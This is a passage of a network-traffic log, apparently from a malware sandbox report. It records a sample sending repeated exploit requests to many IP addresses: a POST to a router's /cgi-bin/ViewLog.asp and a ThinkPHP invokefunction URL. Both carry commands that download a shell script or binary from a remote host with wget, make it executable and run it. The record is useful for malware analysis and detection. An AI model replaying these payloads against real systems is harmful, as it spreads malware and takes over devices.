                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:16.728756905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15192.168.2.153850895.143.69.658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.629456997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:47.840061903 CET185INHTTP/1.1 404 Not Found
                                                      Server: Apache-Coyote/1.1
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 1050
                                                      Date: Wed, 14 Feb 2024 08:28:47 GMT


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16192.168.2.155752895.209.129.23880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.631695986 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17192.168.2.153897431.136.242.678080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.640984058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:50.715275049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:56.859076977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:08.890830994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:33.722090006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.872811079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18192.168.2.155568494.123.65.848080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.648662090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19192.168.2.153641895.58.76.15780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.692128897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:47.994874001 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:28:47.998732090 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20192.168.2.153479095.111.218.6380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.699644089 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:48.008016109 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21192.168.2.153557694.101.49.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.856411934 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      22192.168.2.155892294.122.18.1928080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:47.898025990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      23192.168.2.153559094.101.49.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:48.056087971 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:49.243297100 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      24192.168.2.1551906112.169.120.24280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:49.299837112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:49.576498032 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:28:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      25192.168.2.1552944112.166.212.5580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:49.299901962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      26192.168.2.154477685.93.234.1518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:49.528207064 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:28:49.757848978 CET626INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:28:48 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      27192.168.2.154728095.73.170.17580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:55.841908932 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:56.081674099 CET339INHTTP/1.0 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 11:28:46 GMT
                                                      Server: Boa/0.94.14rc21
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      28192.168.2.155593295.100.203.6980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.038983107 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:56.235270023 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:28:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 63 62 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 36 26 23 34 36 3b 64 35 61 63 30 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;45cb645f&#46;1707899336&#46;d5ac001</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      29192.168.2.155557295.100.53.4980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.050827980 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:28:56.260006905 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:28:56 GMT
                                                      Date: Wed, 14 Feb 2024 08:28:56 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 36 26 23 34 36 3b 37 66 34 38 66 62 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3ef90a17&#46;1707899336&#46;7f48fbb</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      30192.168.2.154064431.200.78.1418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:28:56.064256907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
